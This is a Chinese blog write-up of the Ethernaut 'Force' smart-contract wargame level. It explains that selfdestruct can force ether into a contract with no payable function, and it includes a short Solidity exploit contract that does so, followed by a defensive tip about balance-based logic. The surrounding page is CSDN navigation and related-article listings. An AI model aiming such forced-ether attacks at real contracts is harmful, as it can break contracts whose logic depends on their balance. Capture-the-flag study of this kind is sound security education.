ethernaut——Force

最新推荐文章于 2024-07-15 11:58:08 发布
最新推荐文章于 2024-07-15 11:58:08 发布
阅读量88 收藏
点赞数
分类专栏: ethernaut_2023详解 文章标签: 区块链 智能合约
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_78046362/article/details/130693871
版权

第七关:Force

本关知识点:

向没有payable方法的合约发送以太

1. 题目要求

使合约的余额大于0

2. 代码功能解读

空合约
请添加图片描述

3. 漏洞分析

向空合约发送eth
	普通没有payable方法的合约无法接收eth,但是selfdestruct()方法可以强制发送给其他地址。

4. 攻击方法

创建一个拥有eth的合约,并编写一个自毁函数,接收地址设置为关卡实例地址。

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract Exploit {

    constructor() payable{

    }
    function getContractValue() public view returns(uint256) {
        return address(this).balance;
    }

    function attack(address victim) public{
        selfdestruct(payable(victim));
        
    }

}

5. 攻击调用图

部署的时候向合约传入1wei或者更多,然后通过attack函数调用受害者合约地址,就可以发现攻击者合约中没有以太。请添加图片描述
请添加图片描述

6. 知识点分析

在合约通过balance来做计算的时候要注意,防止黑客操纵合约balance发动攻击。

陵野
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Ethernaut靶场学习实践(二)
m0_68764244的博客
10-07 1580
Ethernaut靶场7-12
corel x-force
10-24
本人不是搞平面的,只是有时候需要转个矢量图用一下,所以最近研究了一下这个软件的国内代理情况。废话不多说,主要目的是怎么不花冤枉钱使用这款软件。
MySQL优化——force index
tom和cat的博客
11-26 1649
不啰嗦,直接入正题。问题是这样的。请问下面的sql语句,要想加快查询速度,该怎么创建索引?以下,以mysql数据库为准。 select * from test where a=? and b>? order by c limit 0,100 结果可能会出乎你的意料。我们首先准备一下运行环境,然后按照最左前缀原则和explain关键字来进行验证。结果真是颠覆了xjjdog多年的认知。 准备阶段 为了进行验证,我们创建一个简单的数据表。里面有a、b、c三个简单的int字段。 CREATE T
探索未来的视觉:力导向图——force-graph
gitblog_00077的博客
05-14 422
探索未来的视觉:力导向图——force-graph 在数据可视化的世界中,力导向图是一种强大的工具,它能将复杂的关系网络转化为直观的图形展示。今天,我们向您推荐一个卓越的开源项目——force-graph,这是一个基于HTML5 canvas的2D力导向图渲染库,能够帮助您以艺术级的方式展示您的数据。 项目地址:https://gitcode.com/vasturiano/force-graph ...
CPU系统级验证——测试激励——force-riscv代码结构分析
知识,既贵,又便宜。
10-26 3013
force-risc是由OpenHW开发的一款针对RISCV的指令集测试激励生成器,目前支持RV64的I、M、A、Zicsr、F、D、C、V(0.9版本)指令生成,且支持M/U/S三种工作模式,且支持动态虚拟内存管理动态,全页异常控制,存储子系统验证等特征,支持可配置状态转换,指令集模拟器互动,测试激励python脚本生成等功能。 该工具已应用于64位的RISCV CPU设计,正在研究32bit的支持。 动态指令集生成器的验证架构 静态指令集生成器的验证架构 优势 通过python API实现的
MySQL 调优 —— force index() 方法强制使用这个索引
weixin_41609327的博客
03-01 491
force index()指令可以指定本次查询使用哪个索引!一条sql只会用到一个索引,mysql优化器会计算出一个合适的索引,但是这个索引不一定是最好的。force index()指令可以避免MySql优化器用到了一个低效的索引。 ...
Kali渗透测试之DVWA系列2——Brute Force(暴力破解)
浅浅的博客
05-11 4938
目录 一、暴力破解原理 二、实验环境 三、实验步骤 安全等级:LOW 安全等级:Medium 暴力破解的四种方式 安全等级:High 安全等级:Impossible 防止暴力破解的有效手段 一、暴力破解原理 暴力破解的原理就是使用攻击者自己的用户名和密码字典,一个一个去枚举,尝试是否能够登录。因为理论上来说,只要字典足够庞大,枚举总是能够成功...
git push --force
热门推荐
Sweeneys的博客
12-17 6万+
一.--force命令 如果git要强制覆盖,那么可以使用--force命令。 $ git push --force origin 二.参考资料 [1]阮一峰 Git远程操作详解
【小白靶场学习】DVWA靶场篇——Burte Force暴力破解
u013569931的博客
11-07 2123
人菜瘾还大的小白靶场修真路
Social Force Model——社会力模型
qq_35424507的博客
12-03 1万+
社会力模型以牛顿动力学为基础,由各个力的表达式来体现行人不同的动机和影响。 个体的实际行为受个体的主观意识、个体之间以及障碍物这三方面因素的影响, 均可将其等效为力在个体上的作用。 步骤如下: foreach(Agent agent in Agents) { if (agent.IsActivity == true) { Vector2 self_For
BSB.zip_rising force
09-24
《BSB.zip_rising force》是一款于2003年推出的大型多人在线角色扮演游戏(MMORPG),名为"rising force"。这款游戏以其丰富的游戏内容、深度的角色发展和广阔的虚拟世界吸引了众多玩家。下面我们将深入探讨其中涉及...
hal.rar_The Force
09-24
标题中的“hal.rar_The Force”可能是指一个与硬件抽象层(Hardware Abstraction Layer, HAL)相关的项目,而“The Force”可能是项目的一个特定部分或者版本名称,寓意它具有强大的功能,如同科幻电影《星球大战》...
3d-force-graph.rar
08-05
A web component to represent a graph data structure in a 3-dimensional space using a force-directed iterative layout. Uses ThreeJS/WebGL for 3D rendering and either d3-force-3d or ngraph for the ...
Lenze 伦茨8400 实际项目配置 L-force Engineer
01-30
Lenze 伦茨8400 实际项目配置 L-force Engineer 400 StateLine Terminal 0、8400 StateLine DiagnosticsError 、8400 StateLine MCI为升降机变频器的参数,三者均应用相同的技术应用程序“控制驱动速度”; 8400 ...
【提交ACM出版 | EI&Scopus检索稳定 | 高录用】第五届大数据与社会科学国际学术会议(ICBDSS 2024,8月16-18)
ai_1020的博客
07-12 1211
【提交ACM出版 | EI&Scopus检索稳定 | 高录用】第五届大数据与社会科学国际学术会议(ICBDSS 2024,8月16-18)大数据、社会科学、数字经济、区块链、人工智能相关主题方向均可投稿
交易平台Zero Hash现已支持SUI交易
Sui_Network的博客
07-12 329
Zero Hash将SUI添加到其超过65种tokens的列表中,使其客户可以访问SUI。
区块链学习05-web3中solidity和move语言
最新发布
qq_46135702的博客
07-15 863
Solidity 和 Move 都是用于开发区块链平台智能合约的编程语言。它们具有一些相似之处,但也存在一些关键差异。的状态变量,用于存储计数器值。的资源变量,用于存储计数器值。导出到 Google 表格。函数将计数器值递增 1。函数将计数器值递增 1。Solidity 文档。此示例定义了一个名为。此示例定义了一个名为。
solidity实战练习5——众筹合约
2303_79193185的博客
07-14 275
【代码】solidity实战练习5——众筹合约。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值